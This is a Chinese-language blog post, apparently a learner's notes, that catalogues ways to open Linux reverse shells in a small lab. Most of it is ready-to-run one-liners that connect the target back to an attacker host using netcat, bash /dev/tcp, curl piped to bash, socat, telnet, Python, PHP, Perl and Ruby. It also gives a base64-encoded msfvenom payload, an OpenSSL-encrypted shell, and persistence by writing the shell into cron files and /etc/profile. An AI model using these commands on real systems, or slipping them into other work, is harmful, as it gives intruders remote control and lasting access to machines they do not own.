



<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#FFF">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">

<link rel="icon" type="image/ico" sizes="32x32" href="/images/favicon.ico">
  <meta http-equiv="Cache-Control" content="no-transform">
  <meta http-equiv="Cache-Control" content="no-siteapp">


<link rel="alternate" type="application/rss+xml" title="Go Forward" href="https://chungod.github.io/rss.xml" />
<link rel="alternate" type="application/atom+xml" title="Go Forward" href="https://chungod.github.io/atom.xml" />
<link rel="alternate" type="application/json" title="Go Forward" href="https://chungod.github.io/feed.json" />

<link rel="stylesheet" href="//fonts.googleapis.com/css?family=Mulish:300,300italic,400,400italic,700,700italic%7CFredericka%20the%20Great:300,300italic,400,400italic,700,700italic%7CNoto%20Serif%20JP:300,300italic,400,400italic,700,700italic%7CNoto%20Serif%20SC:300,300italic,400,400italic,700,700italic%7CInconsolata:300,300italic,400,400italic,700,700italic&display=swap&subset=latin,latin-ext">

<link rel="stylesheet" href="/css/app.css?v=0.2.5">

  
  <meta name="keywords" content="Linux反弹shell多种姿态" />


<link rel="canonical" href="https://chungod.github.io/2021/05/14/Linux%E5%8F%8D%E5%BC%B9shell%E5%A4%9A%E7%A7%8D%E5%A7%BF%E6%80%81/">



  <title>
Linux反弹shell多种姿态 |
Go Forward = 人生像攀登一座山，而找寻出路，却是一种学习的过程，我们应当在这过程中，学习稳定、冷静，学习如何从慌乱中找到生机</title>
<meta name="generator" content="Hexo 5.4.0"></head>
<body itemscope itemtype="http://schema.org/WebPage">
  <div id="loading">
    <div class="cat">
      <div class="body"></div>
      <div class="head">
        <div class="face"></div>
      </div>
      <div class="foot">
        <div class="tummy-end"></div>
        <div class="bottom"></div>
        <div class="legs left"></div>
        <div class="legs right"></div>
      </div>
      <div class="paw">
        <div class="hands left"></div>
        <div class="hands right"></div>
      </div>
    </div>
  </div>
  <div id="container">
    <header id="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="inner">
        <div id="brand">
          <div class="pjax">
          
  <h1 itemprop="name headline">Linux反弹shell多种姿态
  </h1>
  
<div class="meta">
  <span class="item" title="创建时间：2021-05-14 20:19:41">
    <span class="icon">
      <i class="ic i-calendar"></i>
    </span>
    <span class="text">发表于</span>
    <time itemprop="dateCreated datePublished" datetime="2021-05-14T20:19:41+08:00">2021-05-14</time>
  </span>
</div>


          </div>
        </div>
        <nav id="nav">
  <div class="inner">
    <div class="toggle">
      <div class="lines" aria-label="切换导航栏">
        <span class="line"></span>
        <span class="line"></span>
        <span class="line"></span>
      </div>
    </div>
    <ul class="menu">
      <li class="item title"><a href="/" rel="start">Go Forward</a></li>
    </ul>
    <ul class="right">
      <li class="item theme">
        <i class="ic i-sun"></i>
      </li>
      <li class="item search">
        <i class="ic i-search"></i>
      </li>
    </ul>
  </div>
</nav>

      </div>
      <div id="imgs" class="pjax">
        <ul>
          <li class="item" data-background-image="https://tva3.sinaimg.cn/large/6833939bly1giclxxcb6rj20zk0m8b29.jpg"></li>
          <li class="item" data-background-image="https://tva3.sinaimg.cn/large/6833939bly1gicli3sbvtj20zk0m8x6p.jpg"></li>
          <li class="item" data-background-image="https://tva3.sinaimg.cn/large/6833939bly1giclhfehz7j20zk0m8u0x.jpg"></li>
          <li class="item" data-background-image="https://tva3.sinaimg.cn/large/6833939bly1giclffsa1cj20zk0m811l.jpg"></li>
          <li class="item" data-background-image="https://tva3.sinaimg.cn/large/6833939bly1gipevuctzzj20zk0m84qp.jpg"></li>
          <li class="item" data-background-image="https://tva3.sinaimg.cn/large/6833939bly1giclg5ms2rj20zk0m8u0x.jpg"></li>
        </ul>
      </div>
    </header>
    <div id="waves">
      <svg class="waves" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 24 150 28" preserveAspectRatio="none" shape-rendering="auto">
        <defs>
          <path id="gentle-wave" d="M-160 44c30 0 58-18 88-18s 58 18 88 18 58-18 88-18 58 18 88 18 v44h-352z" />
        </defs>
        <g class="parallax">
          <use xlink:href="#gentle-wave" x="48" y="0" />
          <use xlink:href="#gentle-wave" x="48" y="3" />
          <use xlink:href="#gentle-wave" x="48" y="5" />
          <use xlink:href="#gentle-wave" x="48" y="7" />
        </g>
      </svg>
    </div>
    <main>
      <div class="inner">
        <div id="main" class="pjax">
          
  <div class="article wrap">
    
<div class="breadcrumb" itemscope itemtype="https://schema.org/BreadcrumbList">
<i class="ic i-home"></i>
<span><a href="/">首页</a></span>
</div>

    <article itemscope itemtype="http://schema.org/Article" class="post block" lang="zh-CN">
  <link itemprop="mainEntityOfPage" href="https://chungod.github.io/2021/05/14/Linux%E5%8F%8D%E5%BC%B9shell%E5%A4%9A%E7%A7%8D%E5%A7%BF%E6%80%81/">

  <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
    <meta itemprop="image" content="/images/avatar.jpg">
    <meta itemprop="name" content="chun">
    <meta itemprop="description" content="人生像攀登一座山，而找寻出路，却是一种学习的过程，我们应当在这过程中，学习稳定、冷静，学习如何从慌乱中找到生机, 欢迎来到我的博客(*^﹏^*),本人为新人,你可以阅读我的学习笔记并提出独到的见解~我们将互相学习,共同进步,望大佬们勿喷">
  </span>

  <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
    <meta itemprop="name" content="Go Forward">
  </span>

  <div class="body md" itemprop="articleBody">
    

    <h2 id="linux-反弹shell多种姿态"><a class="markdownIt-Anchor" href="#linux-反弹shell多种姿态">#</a> Linux 反弹 shell 多种姿态</h2>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">原理:反弹shell就是控制端监听在某TCP/UDP端口，目标机主动发起请求到攻击机监听的端口，并将其命令行的输入输出转到攻击机</span><br></pre></td></tr></table></figure>
<p>一般反弹 shell 分为两种</p>
<ul>
<li>正向连接</li>
</ul>
<p>用于情况一般为我们攻击了一台机器，打开了该机器的一个端口，攻击者在自己的机器去连接目标机器（目标 ip：目标机器端口），这是比较常规的形式，我们叫做正向连接。远程桌面、web 服务、ssh、telnet 等等都是正向连接。</p>
<ul>
<li>反向连接</li>
</ul>
<p>反弹 shell 通常适用于如下几种情况：</p>
<ol>
<li>目标机因防火墙受限，目标机器只能发送请求，不能接收请求。</li>
<li>目标机端口被占用。</li>
<li>目标机位于局域网，或 IP 会动态变化，攻击机无法直接连接。</li>
<li>对于病毒，木马，受害者什么时候能中招，对方的网络环境是什么样的，什么时候开关机，都是未知的。</li>
</ol>
<p>实验坏境</p>
<p>攻击机：Kali（172.16.9.200）</p>
<p>目标主机：Ubuntu（172.16.9.199）</p>
<h3 id="普通反弹shell"><a class="markdownIt-Anchor" href="#普通反弹shell">#</a> 普通反弹 shell</h3>
<p>攻击机开启本地监听</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nc -lvvp 3333</span><br></pre></td></tr></table></figure>
<p>目标机主动连接攻击机</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">netcat 172.16.9.200 3333 -e /bin/bash</span><br></pre></td></tr></table></figure>
<p>执行效果：</p>
<p><img data-src="https://gitee.com/chungod/picture/raw/master/image/image-20210514112125091.png" alt="image-20210514112125091"></p>
<p><img data-src="https://gitee.com/chungod/picture/raw/master/image/image-20210514112117079.png" alt="image-20210514112117079"></p>
<h3 id="利用bash反弹shell"><a class="markdownIt-Anchor" href="#利用bash反弹shell">#</a> 利用 Bash 反弹 shell</h3>
<p>攻击机开启本地监听</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nc -lvvp 3333</span><br></pre></td></tr></table></figure>
<p>目标机主动连接攻击机</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">bash -i &gt;&amp; /dev/tcp/172.16.9.200/3333 0&gt;&amp;1</span><br></pre></td></tr></table></figure>
<p>执行效果，直接获取到 bash</p>
<p><img data-src="https://gitee.com/chungod/picture/raw/master/image/image-20210514112313985.png" alt="image-20210514112313985"></p>
<p><img data-src="https://gitee.com/chungod/picture/raw/master/image/image-20210514112324027.png" alt="image-20210514112324027"></p>
<h3 id="curl配合bash反弹shell"><a class="markdownIt-Anchor" href="#curl配合bash反弹shell">#</a> Curl 配合 Bash 反弹 shell</h3>
<p>攻击机开启本地监听</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nc -lvvp 3333</span><br></pre></td></tr></table></figure>
<p>目标机 这里操作也很简单，借助了 Linux 中的管道</p>
<p>首先，在攻击者 vps 的 web 目录里面创建一个 <code>index文件</code> （index.php 或 index.html），内容如下：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">vim /var/www/html/index.html</span><br><span class="line">bash -i &gt;&amp; /dev/tcp/172.16.9.200/3333 0&gt;&amp;1</span><br></pre></td></tr></table></figure>
<p>并开启 3333 端口的监听，然后再目标机上执行如下，即可反弹 shell：<img data-src="https://gitee.com/chungod/picture/raw/master/image/image-20210514112954090.png" alt="image-20210514112954090"></p>
<p>执行效果：</p>
<p><img data-src="https://gitee.com/chungod/picture/raw/master/image/image-20210514113144365.png" alt="image-20210514113144365"></p>
<p><img data-src="https://gitee.com/chungod/picture/raw/master/image/image-20210514113155864.png" alt="image-20210514113155864"></p>
<p>Curl 配合 Bash 反弹 shell 的方式在 CTF 题目中经常出现， <code>curl IP|bash</code>  中的 IP 可以是任意格式的，可以是十进制、十六进制、八进制、二进制等等。</p>
<h3 id="写入定时任务反弹shell"><a class="markdownIt-Anchor" href="#写入定时任务反弹shell">#</a> 写入定时任务反弹 shell</h3>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">我们可以在目标主机的定时任务文件中写入一个反弹shell的脚本，但是前提是我们必须要知道目标主机当前的用户名是哪个。因为我们的反弹shell命令是要写在 /var/spool/cron/[crontabs]/&lt;username&gt; 内的，所以必须要知道远程主机当前的用户名。否则就不能生效。</span><br></pre></td></tr></table></figure>
<ul>
<li>当前用户名为 root，我们就要将下面内容写入到 /var/spool/cron/root 中。(centos 系列主机)</li>
<li>当前用户名为 root，我们就要将下面内容写入到 /var/spool/cron/crontabs/root 中。(Debian/Ubuntu 系列主机)</li>
</ul>
<p>实现效果</p>
<p><img data-src="https://gitee.com/chungod/picture/raw/master/image/image-20210514142719763.png" alt="image-20210514142719763"></p>
<p><img data-src="https://gitee.com/chungod/picture/raw/master/image/image-20210514142726506.png" alt="image-20210514142726506"></p>
<h3 id="写入etcprofile文件反弹shell"><a class="markdownIt-Anchor" href="#写入etcprofile文件反弹shell">#</a> 写入 /etc/profile 文件反弹 shell</h3>
<p>将以下反弹 shell 的命写入 /etc/profile 文件中，/etc/profile 中的内容会在用户打开 bash 窗口时执行。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/bin/bash -i &gt;&amp; /dev/tcp/172.16.9.200/3333 0&gt;&amp;1 &amp;</span><br></pre></td></tr></table></figure>
<p><img data-src="https://gitee.com/chungod/picture/raw/master/image/image-20210514142942758.png" alt="image-20210514142942758"></p>
<p>当目标主机管理员远程连接该主机时，就会执行该命令，成功获得目标机的 shell：</p>
<p><img data-src="https://gitee.com/chungod/picture/raw/master/image/image-20210514143946125.png" alt="image-20210514143946125"></p>
<p><img data-src="https://gitee.com/chungod/picture/raw/master/image/image-20210514144000488.png" alt="image-20210514144000488"></p>
<h3 id="利用socat反弹shell"><a class="markdownIt-Anchor" href="#利用socat反弹shell">#</a> 利用 socat 反弹 shell</h3>
<p>攻击机开启本地监听</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">socat TCP-LISTEN:2222 - 或</span><br><span class="line">nc -lvvp 2222</span><br></pre></td></tr></table></figure>
<p>目标机主动连接主机</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">socat tcp-connect:172.16.9.200:2222 exec:&#x27;bash -li&#x27;,ptr,stderr,setsid,sight,sane</span><br></pre></td></tr></table></figure>
<p>实现效果</p>
<p><img data-src="https://gitee.com/chungod/picture/raw/master/image/image-20210514145043081.png" alt="image-20210514145043081"></p>
<p><img data-src="https://gitee.com/chungod/picture/raw/master/image/image-20210514145051036.png" alt="image-20210514145051036"></p>
<h3 id="利用telnet反弹shell"><a class="markdownIt-Anchor" href="#利用telnet反弹shell">#</a> 利用 telnet 反弹 shell</h3>
<p>攻击机开启本地监听</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nc -lvvp 2222</span><br></pre></td></tr></table></figure>
<p>目标机主动连接主机</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mknod a p; telnet 172.16.9.200 2222 0&lt;a | /bin/bash 1&gt;a</span><br></pre></td></tr></table></figure>
<p>实现效果</p>
<p><img data-src="https://gitee.com/chungod/picture/raw/master/image/image-20210514145347386.png" alt="image-20210514145347386"></p>
<p><img data-src="https://gitee.com/chungod/picture/raw/master/image/image-20210514145359190.png" alt="image-20210514145359190"></p>
<h2 id="各种脚本反弹shell"><a class="markdownIt-Anchor" href="#各种脚本反弹shell">#</a> 各种脚本反弹 shell</h2>
<h3 id="python脚本反弹shell"><a class="markdownIt-Anchor" href="#python脚本反弹shell">#</a> python 脚本反弹 shell</h3>
<p>攻击机开启本地监听</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nc -lvvp 2222</span><br></pre></td></tr></table></figure>
<p>目标机主动连接主机</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python -c <span class="string">&#x27;import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((&quot;172.16.9.200&quot;,2222));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([&quot;/bin/sh&quot;,&quot;-i&quot;]);&#x27;</span></span><br></pre></td></tr></table></figure>
<p><img data-src="https://gitee.com/chungod/picture/raw/master/image/image-20210514145830300.png" alt="image-20210514145830300"></p>
<p><img data-src="https://gitee.com/chungod/picture/raw/master/image/image-20210514145838061.png" alt="image-20210514145838061"></p>
<h3 id="php脚本反弹shell"><a class="markdownIt-Anchor" href="#php脚本反弹shell">#</a> php 脚本反弹 shell</h3>
<p>攻击机开启本地监听</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nc -lvvp 2222</span><br></pre></td></tr></table></figure>
<p>目标机主动连接主机 (一)</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">php -r <span class="string">&#x27;$sock=fsockopen(&quot;172.16.9.200&quot;,2222);exec(&quot;/bin/sh -i &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3&quot;);&#x27;</span></span><br></pre></td></tr></table></figure>
<p><img data-src="https://gitee.com/chungod/picture/raw/master/image/image-20210514150401946.png" alt="image-20210514150401946"></p>
<p><img data-src="https://gitee.com/chungod/picture/raw/master/image/image-20210514150354093.png" alt="image-20210514150354093"></p>
<p>目标机主动连接主机 (二)</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">php -r <span class="string">&#x27;exec(&quot;/bin/bash -i &gt;&amp; /dev/tcp/172.16.9.200/2222 0&gt;&amp;1&quot;);&#x27;</span></span><br></pre></td></tr></table></figure>
<p>实现效果</p>
<p><img data-src="https://gitee.com/chungod/picture/raw/master/image/image-20210514151453583.png" alt="image-20210514151453583"></p>
<p><img data-src="https://gitee.com/chungod/picture/raw/master/image/image-20210514151533954.png" alt="image-20210514151533954"></p>
<h3 id="perl脚本反弹shell"><a class="markdownIt-Anchor" href="#perl脚本反弹shell">#</a> perl 脚本反弹 shell</h3>
<p>攻击机开启本地监听</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nc -lvvp 2222</span><br></pre></td></tr></table></figure>
<p>目标主机连接攻击机</p>
<figure class="highlight perl"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">perl -e <span class="string">&#x27;use Socket;$i=&quot;172.16.9.200&quot;;$p=2222;socket(S,PF_INET,SOCK_STREAM,getprotobyname(&quot;tcp&quot;));if(connect(S,sockaddr_in($p,inet_aton($i))))&#123;open(STDIN,&quot;&gt;&amp;S&quot;);open(STDOUT,&quot;&gt;&amp;S&quot;);open(STDERR,&quot;&gt;&amp;S&quot;);exec(&quot;/bin/sh -i&quot;);&#125;;&#x27;</span></span><br></pre></td></tr></table></figure>
<p>实现效果</p>
<p><img data-src="https://gitee.com/chungod/picture/raw/master/image/image-20210514152127846.png" alt="image-20210514152127846"></p>
<p><img data-src="https://gitee.com/chungod/picture/raw/master/image/image-20210514152135839.png" alt="image-20210514152135839"></p>
<h3 id="ruby脚本反弹shell"><a class="markdownIt-Anchor" href="#ruby脚本反弹shell">#</a> Ruby 脚本反弹 shell</h3>
<p>攻击机开启本地监听</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nc -lvvp 2222</span><br></pre></td></tr></table></figure>
<p>目标主机连接攻击机</p>
<figure class="highlight ruby"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">ruby -rsocket -e <span class="string">&#x27;c=TCPSocket.new(&quot;172.16.9.200&quot;,&quot;2222&quot;);while(cmd=c.gets);IO.popen(cmd,&quot;r&quot;)&#123;|io|c.print io.read&#125;end&#x27;</span></span><br><span class="line">或</span><br><span class="line">ruby -rsocket -e <span class="string">&#x27;exit if fork;c=TCPSocket.new(&quot;172.16.9.200&quot;,&quot;2222&quot;);while(cmd=c.gets);IO.popen(cmd,&quot;r&quot;)&#123;|io|c.print io.read&#125;end&#x27;</span></span><br></pre></td></tr></table></figure>
<p>实现效果</p>
<p><img data-src="https://gitee.com/chungod/picture/raw/master/image/image-20210514153951128.png" alt="image-20210514153951128"></p>
<p><img data-src="https://gitee.com/chungod/picture/raw/master/image/image-20210514153957273.png" alt="image-20210514153957273"></p>
<h3 id="利用metasploit生成反弹shell一句话"><a class="markdownIt-Anchor" href="#利用metasploit生成反弹shell一句话">#</a> 利用 metasploit 生成反弹 shell 一句话</h3>
<p>攻击机开启本地监听</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nc -lvvp 2222</span><br></pre></td></tr></table></figure>
<p>我们直接可以使用<strong> msfvenom -l</strong> 结合关键字过滤（如 = cmd/unix/reverse），列出我们需要生成的各类反弹 shell 一句话的 payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfvenom -l payloads | grep &#x27;cmd/unix/reverse&#x27;</span><br></pre></td></tr></table></figure>
<p>生成一个 python 反弹 shell 的一句话</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">msfvenom -p cmd/unix/reverse_python LHOST=172.16.9.200 LPORT=3333 -f raw &gt; shell.py</span><br><span class="line">cat shell.py</span><br></pre></td></tr></table></figure>
<p>将 shell.py 内容复制到目标主机进行执行</p>
<p><img data-src="https://gitee.com/chungod/picture/raw/master/image/image-20210514154549401.png" alt="image-20210514154549401"></p>
<p>目标主机执行</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python -c <span class="string">&quot;exec(__import__(&#x27;base64&#x27;).b64decode(__import__(&#x27;codecs&#x27;).getencoder(&#x27;utf-8&#x27;)(&#x27;aW1wb3J0IHNvY2tldCAgICAgICAgLCAgICAgc3VicHJvY2VzcyAgICAgICAgLCAgICAgb3MgIDsgICAgICAgICBob3N0PSIxNzIuMTYuOS4yMDAiICA7ICAgICAgICAgcG9ydD0yMjIyICA7ICAgICAgICAgcz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVUICAgICAgICAsICAgICBzb2NrZXQuU09DS19TVFJFQU0pICA7ICAgICAgICAgcy5jb25uZWN0KChob3N0ICAgICAgICAsICAgICBwb3J0KSkgIDsgICAgICAgICBvcy5kdXAyKHMuZmlsZW5vKCkgICAgICAgICwgICAgIDApICA7ICAgICAgICAgb3MuZHVwMihzLmZpbGVubygpICAgICAgICAsICAgICAxKSAgOyAgICAgICAgIG9zLmR1cDIocy5maWxlbm8oKSAgICAgICAgLCAgICAgMikgIDsgICAgICAgICBwPXN1YnByb2Nlc3MuY2FsbCgiL2Jpbi9iYXNoIik=&#x27;)[0]))&quot;</span></span><br></pre></td></tr></table></figure>
<p>实现效果</p>
<p><img data-src="https://gitee.com/chungod/picture/raw/master/image/image-20210514154730993.png" alt="image-20210514154730993"></p>
<p><img data-src="https://gitee.com/chungod/picture/raw/master/image/image-20210514154739869.png" alt="image-20210514154739869"></p>
<h3 id="利用openssl反弹加密shell"><a class="markdownIt-Anchor" href="#利用openssl反弹加密shell">#</a> 利用 OpenSSL 反弹加密 shell</h3>
<p>如果我们需要对通信的内容进行混淆或加密，这时可以选择使用 OpenSSL 反弹一个加密的 shell。</p>
<p>首先在攻击机 kali 生成自签名证书</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365 -nodes</span><br></pre></td></tr></table></figure>
<p><img data-src="https://gitee.com/chungod/picture/raw/master/image/image-20210514160946360.png" alt="image-20210514160946360"></p>
<p>利用上一步生成的自签名证书，在攻击机上使用 OpenSSL 监听一个端口</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">openssl s_server -quiet -key key.pem -cert cert.pem -port 2222</span><br></pre></td></tr></table></figure>
<p>目标机进行反弹 shell 操作</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mkfifo /tmp/s; /bin/sh -i &lt; /tmp/s 2&gt;&amp;1 | openssl s_client -quiet -connect 172.16.9.200:2222 &gt; /tmp/s; rm /tmp/s</span><br></pre></td></tr></table></figure>
<p><img data-src="https://gitee.com/chungod/picture/raw/master/image/image-20210514161122042.png" alt="image-20210514161122042"></p>
<p><img data-src="https://gitee.com/chungod/picture/raw/master/image/image-20210514161128816.png" alt="image-20210514161128816"></p>
<h3 id="扩展反弹shell后获取终端"><a class="markdownIt-Anchor" href="#扩展反弹shell后获取终端">#</a> 扩展反弹 shell 后获取终端</h3>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">python -c &#x27;import pty;pty.spawn(&quot;/bin/bash&quot;)&#x27;</span><br><span class="line">python -c &#x27;import pty;pty.spawn(&quot;/bin/sh&quot;)&#x27;</span><br><span class="line">/bin/bash -i</span><br><span class="line">echo os.system(&quot;/bin/bash&quot;);</span><br></pre></td></tr></table></figure>

      <div class="tags">
          <a href="/tags/Linux%E5%8F%8D%E5%BC%B9shell%E5%A4%9A%E7%A7%8D%E5%A7%BF%E6%80%81/" rel="tag"><i class="ic i-tag"></i> Linux反弹shell多种姿态</a>
      </div>
  </div>

   <footer>

    <div class="meta">
  <span class="item">
    <span class="icon">
      <i class="ic i-calendar-check"></i>
    </span>
    <span class="text">更新于</span>
    <time title="修改时间：2021-05-14 20:19:06" itemprop="dateModified" datetime="2021-05-14T20:19:06+08:00">2021-05-14</time>
  </span>
</div>

      
<div class="reward">
  <button><i class="ic i-heartbeat"></i> 赞赏</button>
  <p>请我喝[茶]~(￣▽￣)~*</p>
  <div id="qr">
      
      <div>
        <img data-src="/images/wechatpay.png" alt="chun 微信支付">
        <p>微信支付</p>
      </div>
      
      <div>
        <img data-src="/images/avatar.jpg" alt="chun 支付宝">
        <p>支付宝</p>
      </div>
  </div>
</div>

      

<div id="copyright">
<ul>
  <li class="author">
    <strong>本文作者： </strong>chun <i class="ic i-at"><em>@</em></i>Go Forward
  </li>
  <li class="link">
    <strong>本文链接：</strong>
    <a href="https://chungod.github.io/2021/05/14/Linux%E5%8F%8D%E5%BC%B9shell%E5%A4%9A%E7%A7%8D%E5%A7%BF%E6%80%81/" title="Linux反弹shell多种姿态">https://chungod.github.io/2021/05/14/Linux反弹shell多种姿态/</a>
  </li>
  <li class="license">
    <strong>版权声明： </strong>本站所有文章除特别声明外，均采用 <span class="exturl" data-url="aHR0cHM6Ly9jcmVhdGl2ZWNvbW1vbnMub3JnL2xpY2Vuc2VzL2J5LW5jLXNhLzQuMC9kZWVkLnpo"><i class="ic i-creative-commons"><em>(CC)</em></i>BY-NC-SA</span> 许可协议。转载请注明出处！
  </li>
</ul>
</div>

  </footer>

</article>

  </div>
  

<div class="post-nav">
    <div class="item left">
      

  <a href="/2021/05/05/%E6%BA%AF%E6%BA%90%E5%8F%96%E8%AF%81%E6%80%BB%E7%BB%93/" itemprop="url" rel="prev" data-background-image="https:&#x2F;&#x2F;tva3.sinaimg.cn&#x2F;mw690&#x2F;6833939bly1giclhtuo6nj20zk0m8ttm.jpg" title="溯源取证总结">
  <span class="type">上一篇</span>
  <span class="category"><i class="ic i-flag"></i> </span>
  <h3>溯源取证总结</h3>
  </a>

    </div>
    <div class="item right">
      

  <a href="/2021/07/18/Linux%E6%8F%90%E6%9D%83%E7%AC%94%E8%AE%B0/" itemprop="url" rel="next" data-background-image="https:&#x2F;&#x2F;tva3.sinaimg.cn&#x2F;mw690&#x2F;6833939bly1giclhnx9glj20zk0m8npd.jpg" title="Linux提权笔记">
  <span class="type">下一篇</span>
  <span class="category"><i class="ic i-flag"></i> </span>
  <h3>Linux提权笔记</h3>
  </a>

    </div>
</div>

  
  <div class="wrap" id="comments"></div>


        </div>
        <div id="sidebar">
          

<div class="inner">

  <div class="panels">
    <div class="inner">
      <div class="contents panel pjax" data-title="文章目录">
          <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#linux-%E5%8F%8D%E5%BC%B9shell%E5%A4%9A%E7%A7%8D%E5%A7%BF%E6%80%81"><span class="toc-number">1.</span> <span class="toc-text"> Linux 反弹 shell 多种姿态</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%99%AE%E9%80%9A%E5%8F%8D%E5%BC%B9shell"><span class="toc-number">1.1.</span> <span class="toc-text"> 普通反弹 shell</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%88%A9%E7%94%A8bash%E5%8F%8D%E5%BC%B9shell"><span class="toc-number">1.2.</span> <span class="toc-text"> 利用 Bash 反弹 shell</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#curl%E9%85%8D%E5%90%88bash%E5%8F%8D%E5%BC%B9shell"><span class="toc-number">1.3.</span> <span class="toc-text"> Curl 配合 Bash 反弹 shell</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%86%99%E5%85%A5%E5%AE%9A%E6%97%B6%E4%BB%BB%E5%8A%A1%E5%8F%8D%E5%BC%B9shell"><span class="toc-number">1.4.</span> <span class="toc-text"> 写入定时任务反弹 shell</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%86%99%E5%85%A5etcprofile%E6%96%87%E4%BB%B6%E5%8F%8D%E5%BC%B9shell"><span class="toc-number">1.5.</span> <span class="toc-text"> 写入 &#x2F;etc&#x2F;profile 文件反弹 shell</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%88%A9%E7%94%A8socat%E5%8F%8D%E5%BC%B9shell"><span class="toc-number">1.6.</span> <span class="toc-text"> 利用 socat 反弹 shell</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%88%A9%E7%94%A8telnet%E5%8F%8D%E5%BC%B9shell"><span class="toc-number">1.7.</span> <span class="toc-text"> 利用 telnet 反弹 shell</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%90%84%E7%A7%8D%E8%84%9A%E6%9C%AC%E5%8F%8D%E5%BC%B9shell"><span class="toc-number">2.</span> <span class="toc-text"> 各种脚本反弹 shell</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#python%E8%84%9A%E6%9C%AC%E5%8F%8D%E5%BC%B9shell"><span class="toc-number">2.1.</span> <span class="toc-text"> python 脚本反弹 shell</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#php%E8%84%9A%E6%9C%AC%E5%8F%8D%E5%BC%B9shell"><span class="toc-number">2.2.</span> <span class="toc-text"> php 脚本反弹 